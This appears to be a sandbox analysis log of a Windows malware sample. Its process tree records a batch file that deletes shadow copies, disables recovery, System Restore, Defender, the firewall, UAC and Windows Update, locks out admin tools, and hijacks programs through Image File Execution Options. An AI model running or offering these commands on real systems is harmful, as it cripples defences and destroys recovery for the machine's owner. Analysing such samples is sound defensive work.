C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4672,i,17861774200348228700,711109505159770159,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4684 /prefetch:82⤵PID:4016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4768,i,17861774200348228700,711109505159770159,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4920 /prefetch:82⤵PID:3804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4924,i,17861774200348228700,711109505159770159,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4756 /prefetch:82⤵PID:2180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4692,i,17861774200348228700,711109505159770159,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4660 /prefetch:12⤵PID:1980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5036,i,17861774200348228700,711109505159770159,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4404 /prefetch:82⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3276
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:736
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:2864
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\idk.txt1⤵
- Opens file in notepad (likely ransom note)
PID:2428
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\idk.bat" "1⤵PID:1080
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f2⤵PID:4080
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v EnableScripts /t REG_DWORD /d 0 /f2⤵PID:332
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2736
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:2920
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3788
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootmenupolicy Standard2⤵
- Modifies boot configuration data using bcdedit
PID:716
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} advancedoptions No2⤵
- Modifies boot configuration data using bcdedit
PID:1632
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:736
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:4964
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:3088
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} advancedoptions No2⤵
- Modifies boot configuration data using bcdedit
PID:3876
-
-
C:\Windows\system32\ReAgentc.exereagentc /disable2⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1520
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableWinRE /t REG_DWORD /d 1 /f2⤵PID:3560
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootmenupolicy Standard2⤵
- Modifies boot configuration data using bcdedit
PID:2136
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootmenupolicy legacy2⤵
- Modifies boot configuration data using bcdedit
PID:1472
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1552
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootmenupolicy legacy2⤵
- Modifies boot configuration data using bcdedit
PID:4016
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:1040
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵PID:1728
-
-
C:\Windows\system32\sc.exesc config vss start= disabled2⤵
- Launches sc.exe
PID:1360
-
-
C:\Windows\system32\sc.exesc stop vss2⤵
- Launches sc.exe
PID:1984
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2044
-
-
C:\Windows\system32\diskpart.exediskpart /s "C:\Users\Admin\Desktop\delete_recovery.txt"2⤵PID:1684
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableWinRE /t REG_DWORD /d 1 /f2⤵PID:1852
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /v Start /t REG_DWORD /d 4 /f2⤵
- Modifies security service
PID:3348
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f2⤵PID:3696
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled2⤵
- Launches sc.exe
PID:2184
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:2928
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskScheduler /t REG_DWORD /d 1 /f2⤵PID:2340
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:2212
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootmenupolicy Standard2⤵
- Modifies boot configuration data using bcdedit
PID:3136
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\WindowsFirewall\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f2⤵PID:4644
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\WindowsFirewall\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f2⤵PID:3112
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵PID:1988
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSettingsPageVisibility /t REG_SZ /d "hide:" /f2⤵PID:4788
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f2⤵PID:2420
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:3936
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisallowRun /t REG_DWORD /d 1 /f2⤵
- Blocks application from running via registry modification
PID:2176
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\Installer" /v DisableMSI /t REG_DWORD /d 1 /f2⤵PID:3652
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\WindowsStore" /v RemoveWindowsStore /t REG_DWORD /d 1 /f2⤵PID:1308
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f2⤵PID:4180
-
-
C:\Windows\system32\net.exenet localgroup Administrators "Standard User" /delete2⤵
- Indicator Removal: Network Share Connection Removal
PID:3068 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "Standard User" /delete3⤵
- Indicator Removal: Network Share Connection Removal
PID:432
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f2⤵PID:4868
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f2⤵PID:2716
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableGPEdit /t REG_DWORD /d 1 /f2⤵PID:916
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled2⤵
- Launches sc.exe
PID:4916
-
-
C:\Windows\system32\net.exenet stop wuauserv2⤵PID:644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wuauserv3⤵PID:1200
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵PID:1368
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3188
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f2⤵PID:4492
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {globalsettings} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1668
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisablePasswordReset /t REG_DWORD /d 1 /f2⤵PID:4340
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f2⤵PID:3180
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f2⤵PID:3940
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSFCDisable /t REG_DWORD /d 1 /f2⤵PID:4524
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f2⤵PID:3336
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 0 /f2⤵PID:576
-
-
C:\Windows\system32\ReAgentc.exereagentc /disable2⤵
- Drops file in Windows directory
PID:876
-
-
C:\Windows\system32\sc.exesc config vss start= disabled2⤵
- Launches sc.exe
PID:2820
-
-
C:\Windows\system32\sc.exesc config srservice start= disabled2⤵
- Launches sc.exe
PID:2796
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:332
-
-
C:\Windows\system32\sc.exesc config Schedule start= disabled2⤵
- Launches sc.exe
PID:2200
-
-
C:\Windows\system32\net.exenet stop Schedule2⤵PID:716
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Schedule3⤵PID:1632
-
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootmenupolicy legacy2⤵
- Modifies boot configuration data using bcdedit
PID:736
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:4964
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled2⤵
- Launches sc.exe
PID:3088
-
-
C:\Windows\system32\net.exenet stop wuauserv2⤵PID:440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wuauserv3⤵PID:976
-
-
-
C:\Windows\system32\sc.exesc config trustedinstaller start= disabled2⤵
- Launches sc.exe
PID:2352
-
-
C:\Windows\system32\net.exenet stop trustedinstaller2⤵PID:1100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop trustedinstaller3⤵PID:5104
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender\Policy Manager" /v DisableAntiTamper /t REG_DWORD /d 1 /f2⤵PID:2596
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
PID:1196
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\UsbHub" /v Start /t REG_DWORD /d 4 /f2⤵PID:1564
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f2⤵PID:3428
-
-
C:\Windows\system32\sc.exesc config winmgmt start= disabled2⤵
- Launches sc.exe
PID:2560
-
-
C:\Windows\system32\net.exenet stop winmgmt2⤵PID:4504
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop winmgmt3⤵PID:1360
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate" /v DisableRollback /t REG_DWORD /d 1 /f2⤵PID:1684
-
-
C:\Windows\system32\sc.exesc config netprofm start= disabled2⤵
- Launches sc.exe
PID:1852
-
-
C:\Windows\system32\net.exenet stop netprofm2⤵PID:3680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop netprofm3⤵PID:4880
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵PID:2288
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoEventViewer /t REG_DWORD /d 1 /f2⤵PID:1388
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableChangeTime /t REG_DWORD /d 1 /f2⤵PID:3860
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\MMC" /f2⤵PID:2444
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\MMC" /v RestrictToPermittedSnapins /t REG_DWORD /d 1 /f2⤵PID:4928
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\MMC\{58221C67-EA27-11CF-ADCF-00AA00A80033}" /v Restrict_Run /t REG_DWORD /d 1 /f2⤵PID:4372
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:2712
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f2⤵PID:1340
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵PID:696
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f2⤵PID:3528
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoWinKeys /t REG_DWORD /d 1 /f2⤵PID:4316
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v EnableScripts /t REG_DWORD /d 0 /f2⤵PID:2160
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v ExecutionPolicy /t REG_SZ /d "Restricted" /f2⤵PID:1232
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4648
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\svchost.exe" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3344
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4972
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵PID:4616
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f2⤵PID:3676
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v EnableScripts /t REG_DWORD /d 0 /f2⤵PID:3000
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\PowerShell" /v ExecutionPolicy /t REG_SZ /d "Restricted" /f2⤵PID:916
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f2⤵PID:3584
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f2⤵PID:644
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoWinKeys /t REG_DWORD /d 1 /f2⤵PID:1368
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootmenupolicy Standard2⤵
- Modifies boot configuration data using bcdedit
PID:3708
-
-
C:\Windows\system32\bcdedit.exebcdedit /deletevalue {default} safeboot2⤵
- Modifies boot configuration data using bcdedit
PID:3188
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:4492
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} advancedoptions No2⤵
- Modifies boot configuration data using bcdedit
PID:1668
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:4340
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3180
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3940
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4524
-
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
PID:3336
-
-
C:\Windows\system32\net.exenet stop WinDefend2⤵PID:576
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend3⤵PID:1404
-
-
-
C:\Windows\system32\sc.exesc config wuauserv start= disabled2⤵
- Launches sc.exe
PID:4820
-
-
C:\Windows\system32\net.exenet stop wuauserv2⤵PID:540
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wuauserv3⤵PID:2820
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f2⤵PID:2920
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:8
-
-
C:\Windows\system32\sc.exesc config MpsSvc start= disabled2⤵
- Launches sc.exe
PID:716
-
-
C:\Windows\system32\net.exenet stop MpsSvc2⤵PID:3332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpsSvc3⤵PID:736
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
PID:2592
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootstatuspolicy IgnoreAllFailures2⤵
- Modifies boot configuration data using bcdedit
PID:3876
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:3380
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore" /f2⤵PID:3972
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f2⤵PID:712
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableConfig /t REG_DWORD /d 1 /f2⤵PID:772
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableMonitoring /t REG_DWORD /d 1 /f2⤵PID:1136
-
-
C:\Windows\system32\sc.exesc config srservice start= disabled2⤵
- Launches sc.exe
PID:2760
-
-
C:\Windows\system32\net.exenet stop srservice2⤵PID:1564
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop srservice3⤵PID:3428
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f2⤵PID:2560
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d "Off" /f2⤵PID:4320
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f2⤵PID:2320
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows\Installer" /v DisableMSI /t REG_DWORD /d 2 /f2⤵PID:2252
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3092
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\svchost.exe" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2996
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3888
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3848
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe" /v Debugger /t REG_SZ /d "cmd.exe" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3080
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f2⤵
- Disables RegEdit via registry modification
PID:1036
-
-
C:\Windows\system32\gpupdate.exegpupdate /force2⤵PID:3816
-
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2496
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:1636
-
C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:952 -
C:\Windows\system32\wsl.exeC:\Windows\system32\wsl.exe --list2⤵PID:3180
-
-
C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe" --headless --win32input --resizeQuirk --width 120 --height 27 --signal 0xa34 --server 0xa402⤵PID:4020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:716 -
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe cmd.exe "C:\Windows\system32\Taskmgr.exe"3⤵PID:1860
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe "C:\Windows\system32\cmd.exe"3⤵PID:4888
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe cmd.exe "C:\Windows\regedit.exe"3⤵PID:2996
-
-
C:\Windows\system32\control.exe"C:\Windows\system32\control.exe"3⤵PID:4420
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3160
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:4740
-
C:\Windows\system32\control.exe"C:\Windows\system32\control.exe" /name Microsoft.AdministrativeTools1⤵PID:576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:696
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.bing.com/search?q=Control+p&FORM=IE8SRC1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1508 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff819aa3cb8,0x7ff819aa3cc8,0x7ff819aa3cd82⤵PID:1368
-
-
